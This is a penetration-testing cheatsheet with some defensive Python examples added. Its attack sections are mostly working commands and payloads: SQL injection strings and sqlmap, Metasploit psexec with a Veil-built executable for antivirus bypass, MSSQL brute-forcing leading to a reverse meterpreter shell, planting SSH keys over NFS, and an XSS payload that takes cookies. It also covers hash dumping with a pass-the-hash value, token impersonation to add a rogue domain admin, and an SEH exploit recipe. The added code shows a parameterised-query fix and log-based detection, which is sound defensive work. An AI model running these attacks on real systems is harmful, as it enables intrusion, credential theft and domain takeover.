
Secure Copy (scp) Cheatsheet

  • Copy remote file to local host
  • Copy local file to remote host
  • Copy local directory to remote directory
  • Copy a file from one remote host to another
  • Improve scp performance (use blowfish)

SQL Injection

Union Based SQL Injection

' or 1=1#
1' ORDER BY 10#
1' UNION SELECT version(),2#
1' UNION SELECT version(),database()#
1' UNION SELECT version(),user()#
1' UNION ALL SELECT table_name,2 from information_schema.tables#
1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#
1' UNION ALL SELECT concat(user,char(58),password),2 from users

sqlmap --url="" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs

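The payloads above only work because the application splices the input into the query text, so a quote in the input ends the string literal and everything after it is parsed as SQL. As an added example that is not part of the original cheatsheet, the following Python builds an in-memory SQLite table (a constructed stand-in for the `users` table referenced above) and runs the same lookup twice: once by string concatenation, once with a bound parameter. SQLite has no `#` comment syntax, so the MySQL-style probes from the list are rewritten as a quoted tautology and a `--`-terminated UNION; the tautology mirrors `' or 1=1#` and the UNION probe mirrors `1' UNION SELECT version(),2#`.

```python
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the cheatsheet's `users` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, user TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (user, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    conn.commit()
    return conn


def vulnerable_lookup(conn, username):
    """String concatenation: the caller's input becomes part of the SQL grammar,
    so a quote in the input closes the literal and the rest is parsed as SQL."""
    sql = "SELECT user, password FROM users WHERE user = '" + username + "'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, username):
    """Bound parameter: the driver passes the value out of band, so the input can
    only ever be compared against the column, never parsed as SQL."""
    sql = "SELECT user, password FROM users WHERE user = ?"
    return conn.execute(sql, (username,)).fetchall()


# SQLite equivalent of the cheatsheet's ' or 1=1# (SQLite comments use --, not #).
TAUTOLOGY = "' OR '1'='1"
# Two-column UNION probe, the equivalent of 1' UNION SELECT version(),2#.
UNION_PROBE = "' UNION SELECT sqlite_version(), 'x' --"


def demo():
    """Run both probes through both lookups and return the row counts."""
    conn = build_db()
    return {
        "vulnerable_tautology": len(vulnerable_lookup(conn, TAUTOLOGY)),
        "vulnerable_union": len(vulnerable_lookup(conn, UNION_PROBE)),
        "safe_tautology": len(safe_lookup(conn, TAUTOLOGY)),
        "safe_union": len(safe_lookup(conn, UNION_PROBE)),
    }


if __name__ == "__main__":
    print(demo())
```

The concatenated version returns every row for the tautology and a row containing the database version for the UNION probe, exactly the behaviour the list above relies on; the parameterised version returns nothing for either, because the whole string is compared against the `user` column as data. The fix is the placeholder, not escaping: any driver that supports bound parameters closes this class of bug for the query it is used in.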
AV bypass

1. Generate an executable using Veil.
2. In msfconsole, set up psexec with the relevant payload, then follow these steps:

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST ip
RHOST => ip
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe
EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe
msf exploit(psexec) > exploit

Apache SSL

Enabling a self-signed certificate on a local website:

1. Install OpenSSL:
   sudo apt-get install openssl
2. Run the following command to generate the self-signed certificate and its private key:
   sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key
3. Enable the SSL module for Apache:
   sudo a2enmod ssl
4. Make the default-ssl site available by creating a symbolic link:
   sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf
5. Edit the file default-ssl.conf:
   sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf
   Change the following lines to point to the certs:
   SSLCertificateFile /etc/ssl/certs/server.crt
   SSLCertificateKeyFile /etc/ssl/private/server.key
6. Restart Apache:
   sudo /etc/init.d/apache2 restart

Attacking MS-SQL

Attacking MSSQL with Metasploit

  • Enumerate MSSQL Servers on the network:
    msf > use auxiliary/scanner/mssql/mssql_ping
    nmap -sU --script=ms-sql-info ip
  • Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio.
  • Bruteforce MSSQL Database:
    msf > use auxiliary/scanner/mssql/mssql_login
  • Enumerate MSSQL Database:
    msf > use auxiliary/admin/mssql/mssql_enum
  • Gain shell using gathered credentials:
    msf > use exploit/windows/mssql/mssql_payload
    msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

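The bruteforce step above is noisy on the server side: every failed attempt is written to the SQL Server ERRORLOG as error 18456 followed by a "Login failed for user" line that names the login and the client address. As an added example that is not part of the original cheatsheet, the following Python parses a batch of such lines (constructed inline in the ERRORLOG layout; the addresses and login names are made up) and reports clients whose failure count crosses a threshold, together with the logins they tried. The threshold value and the field names of the returned dictionary are choices made for this example.

```python
import re
from collections import Counter

# Constructed sample lines in SQL Server ERRORLOG layout (not from a real host).
# State 8 = wrong password, State 5 = login does not exist; a password-guessing
# run against one server typically produces a burst of both from one client.
SAMPLE_ERRORLOG = """\
2024-03-01 10:00:01.10 Logon       Error: 18456, Severity: 14, State: 8.
2024-03-01 10:00:01.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-03-01 10:00:01.35 Logon       Error: 18456, Severity: 14, State: 8.
2024-03-01 10:00:01.35 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-03-01 10:00:01.60 Logon       Error: 18456, Severity: 14, State: 8.
2024-03-01 10:00:01.60 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-03-01 10:00:02.00 Logon       Error: 18456, Severity: 14, State: 5.
2024-03-01 10:00:02.00 Logon       Login failed for user 'backup'. Reason: Could not find a login matching the name provided. [CLIENT: 10.0.0.5]
2024-03-01 10:05:00.00 Logon       Error: 18456, Severity: 14, State: 8.
2024-03-01 10:05:00.00 Logon       Login failed for user 'app_user'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.9]
2024-03-01 10:05:03.00 Logon       Login succeeded for user 'app_user'. Connection made using SQL Server authentication. [CLIENT: 10.0.0.9]
"""

# Matches only the "Login failed" line; the preceding "Error: 18456" line and
# successful logins are ignored.
LOGIN_FAILED = re.compile(
    r"Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_failures(text):
    """Return a (login, client) pair for every failed-login line in `text`."""
    pairs = []
    for line in text.splitlines():
        m = LOGIN_FAILED.search(line)
        if m:
            pairs.append((m.group("user"), m.group("client")))
    return pairs


def find_bruteforce(text, threshold=3):
    """Clients with at least `threshold` failed logins, and the logins they tried.

    Returns {client: {"failures": n, "users": [sorted login names]}}.
    """
    failures = parse_failures(text)
    per_client = Counter(client for _, client in failures)
    return {
        client: {
            "failures": n,
            "users": sorted({u for u, c in failures if c == client}),
        }
        for client, n in per_client.items()
        if n >= threshold
    }


if __name__ == "__main__":
    for client, info in find_bruteforce(SAMPLE_ERRORLOG).items():
        print(f"{client}: {info['failures']} failures against {info['users']}")
```

On the sample, 10.0.0.5 is reported with four failures across two logins, while 10.0.0.9 (one wrong password followed by a success) is not. A real deployment would add a time window, but the shape is the same: correlate on the `[CLIENT: …]` field, not on the login name, because a scanner rotates logins.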
Bash Scripting

Simple Bash Scripting Cheatsheet

  • ctrl + y: Navigate to the previous page in nano.
  • ctrl + w: Find/search for a specific term in nano.
  • ctrl + k: Cut the current line of text in nano.
  • ctrl + x: Exit the nano editor.
  • touch file: create a new text file named "file".
  • file.ifconfig > tmp: create an empty file named "file.ifconfig" and redirect its output to "tmp".
  • nano file: open the nano editor with the file named "file".
  • ifconfig > tmp: execute the ifconfig command and save its output to the file "tmp".
  • echo >> tmp; ping -c3 >> tmp: append the output of the "ping" command to the file "tmp".
  • cat file: display the contents of the file "file".
  • more file: display the contents of the file "file" one page at a time.
  • head file: display the first 10 lines of the file "file".
  • head -15 file: display the first 15 lines of the file "file".
  • tail file: display the last 10 lines of the file "file".
  • tail -15 file: display the last 15 lines of the file "file".
  • tail -f file: continuously display the output of the file "file" (useful for log files).
  • cat tmp | grep Bcast: pipe the output of "cat tmp" to the grep command, searching for "Bcast".
  • ps aux: display all running processes for all users.
  • kill -9 PID: forcefully terminate the process with the specified PID.
  • wc -l tmp2: count the number of lines in the file "tmp2".
  • cut -d delimiter -f fields: cut fields from lines of a file based on a delimiter.
  • sort -u file: sort the contents of the file "file" and remove duplicates.
  • sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n: sort IP addresses correctly.
  • awk '{print $1}' file: display the first column of the file "file".
  • awk '{print $1,$5}' file: display the first and fifth columns of the file "file".
  • grep -v 'string' file: display lines from the file "file" that do not contain the specified string.
  • egrep -v '(string1|string2|string3)' file: display lines from the file "file" that do not contain multiple specified strings.
  • sed 's/FOO/BAR/g' file: replace all occurrences of "FOO" with "BAR" in the file "file".
  • sed 's/FOO//g' file: remove all occurrences of "FOO" from the file "file".
  • sed '/^FOO/d' file: remove lines from the file "file" that start with "FOO".
  • Set text color: echo -e "\e[1;34m This is a blue text.\e[0m"

Bash Scripts

  • Simple bash script:
    #!/bin/bash
    echo "Hello world."
  • Make a file executable:
    chmod +x file
    chmod 755 file
  • Variables ($USER is set by the shell; $name is assumed to have been set earlier in the script):
    echo "$USER"
    echo 'Hello' "$name". 'You are running as' "$USER".
  • IP Address:
    echo "Hello World"
    ip=$(ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1)
    echo "Hello" "$name" "Your IP address is:" "$ip"
  • User Input:
    echo "Please input your domain:"
    read -p "Domain:" domain
    ping -c 5 "$domain"
  • Check For No User Input (quote the variable so an empty value does not break the test, and close the block with fi):
    if [ -z "$domain" ]; then
        echo "#########################"
        echo "Invalid choice."
    fi
  • For loops (do and done are required):
    for host in $(cat hosts.txt); do
        command "$host"
    done
  • One Liners: Port Scan
    for port in $(cat Ports.txt); do nc -nzv ip $port & sleep 0.5; done

CTF Notes

  • Enumerate users via finger.
  • Show the NFS shares available:
    showmount -e ip
  • Use nfspysh to mount the share and create a .ssh directory:
    nfspysh -o server=ip:/home/user
    mkdir .ssh
    cd .ssh
  • Generate an SSH key pair:
    ssh-keygen
    cp /tmp/authorized_keys
  • Transfer the attacker's public key to the host:
    put /tmp/authorized_keys
    exit
  • Log in to the SSH server with no password.
  • Start a web service:
    python -m SimpleHTTPServer 80
  • Use one of the following XSS payloads:
    document.write('<img src="' + document.cookie + '">');

Domain Admin Exploitation

After compromising a Windows machine:

  • List the domain administrators:
    From Shell - net group "Domain Admins" /domain
  • Dump the hashes (Metasploit):
    msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE
  • Find the admins (Metasploit):
    spool /tmp/enumdomainusers.txt
    msf > use auxiliary/scanner/smb/smb_enumusers_domain
    msf > set smbuser Administrator
    msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    msf > set rhosts ip/24
    msf > set threads 8
    msf > run
    msf > spool off

Compromise Admin's box

meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token MYDOM\\administrator
meterpreter > getuid
meterpreter > shell
C:\> whoami
mydom\administrator
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain
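The last two commands above leave an unambiguous trail in the domain controller's Security log: event 4720 (a user account was created) followed within seconds by event 4728 (a member was added to a security-enabled global group) naming "Domain Admins". As an added example that is not part of the original page, the following Python checks a batch of such records, constructed inline with the field names from the 4720/4728 event schema (the account, group and timestamp values are made up), first for any addition to a privileged group and then for the tighter pattern of an account that was created and made a domain admin inside one time window. The watched-group set and the one-hour window are choices made for this example.

```python
from datetime import datetime, timedelta

# Constructed Security-log records, reduced to the fields the checks need.
# Field names follow the 4720 / 4728 event schema; the values are made up.
# In 4728, TargetUserName is the group and MemberName is the member's DN.
SAMPLE_EVENTS = [
    {"EventID": 4720, "TimeCreated": "2024-03-01T10:00:00Z",
     "SubjectUserName": "administrator", "TargetUserName": "hacker"},
    {"EventID": 4728, "TimeCreated": "2024-03-01T10:00:05Z",
     "SubjectUserName": "administrator", "TargetUserName": "Domain Admins",
     "MemberName": "CN=hacker,CN=Users,DC=mydom,DC=local"},
    {"EventID": 4728, "TimeCreated": "2024-03-01T11:30:00Z",
     "SubjectUserName": "jdoe", "TargetUserName": "Domain Admins",
     "MemberName": "CN=jsmith,CN=Users,DC=mydom,DC=local"},
    {"EventID": 4728, "TimeCreated": "2024-03-01T12:00:00Z",
     "SubjectUserName": "jdoe", "TargetUserName": "Helpdesk",
     "MemberName": "CN=jsmith,CN=Users,DC=mydom,DC=local"},
    {"EventID": 4624, "TimeCreated": "2024-03-01T12:05:00Z",
     "SubjectUserName": "-", "TargetUserName": "jsmith"},
]

# Groups whose membership changes always deserve a look (example choice).
WATCHED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins"}


def _cn(dn):
    """'CN=hacker,CN=Users,DC=mydom,DC=local' -> 'hacker'."""
    return dn.split(",")[0].split("=", 1)[1]


def _ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def privileged_group_additions(events):
    """Every 4728 whose target group is watched, as (member, group, actor)."""
    return [
        (_cn(e["MemberName"]), e["TargetUserName"], e["SubjectUserName"])
        for e in events
        if e["EventID"] == 4728 and e["TargetUserName"] in WATCHED_GROUPS
    ]


def fresh_accounts_made_admin(events, window=timedelta(hours=1)):
    """Members added to a watched group within `window` of their own 4720.

    This is the 'net user /add' + 'net group ... /add' pattern from the page:
    a brand-new account has no business in Domain Admins.
    """
    created = {
        e["TargetUserName"]: _ts(e["TimeCreated"])
        for e in events if e["EventID"] == 4720
    }
    hits = []
    for e in events:
        if e["EventID"] != 4728 or e["TargetUserName"] not in WATCHED_GROUPS:
            continue
        member = _cn(e["MemberName"])
        if member not in created:
            continue
        age = _ts(e["TimeCreated"]) - created[member]
        if timedelta(0) <= age <= window:
            hits.append(member)
    return hits


if __name__ == "__main__":
    for member, group, actor in privileged_group_additions(SAMPLE_EVENTS):
        print(f"{actor} added {member} to {group}")
    print("new accounts made admin:", fresh_accounts_made_admin(SAMPLE_EVENTS))
```

On the sample, both additions to Domain Admins are listed (the existing `jsmith` account as well as the new one), but only `hacker` trips the created-then-promoted check; the Helpdesk addition and the 4624 logon are ignored. Either list is a candidate for an alert; the second one has essentially no benign explanation.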

Exploit Development Cheatsheet

Simple fuzzer: send progressively longer buffers until the target stops answering.

import socket

# Build buffers of 50, 100, 150 ... bytes (the first entry is a single "A").
buffer = ["A"]
counter = 50
while len(buffer) <= 1000:
    buffer.append("A" * counter)
    counter = counter + 50

# Send each buffer on a fresh connection; the length printed just before the
# target stops responding bounds the crash offset.
for buffstring in buffer:
    print("Fuzzing: " + str(len(buffstring)))
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(("", 5555))
    sock.send(buffstring.encode())
    sock.close()
Bad Character

Structured Exception Handler (SEH) Exploitation notes

  • Crash the application.
  • Check for an SEH overwrite (view the SEH chain).
  • Find the offset (!mona pattern_create ).
  • Find the SEH references to the cyclic pattern (!mona findmsp) and verify the offset to NSEH (Next Exception).
  • Find a POP/POP/RET address with mona (!mona seh -cpb ).
  • Add a short jump to the payload to jump over the SEH record ("\xeb\x06" + 2 bytes of padding).
  • Add the shellcode to the payload.
  • Keep the existing padding so that the crash still happens.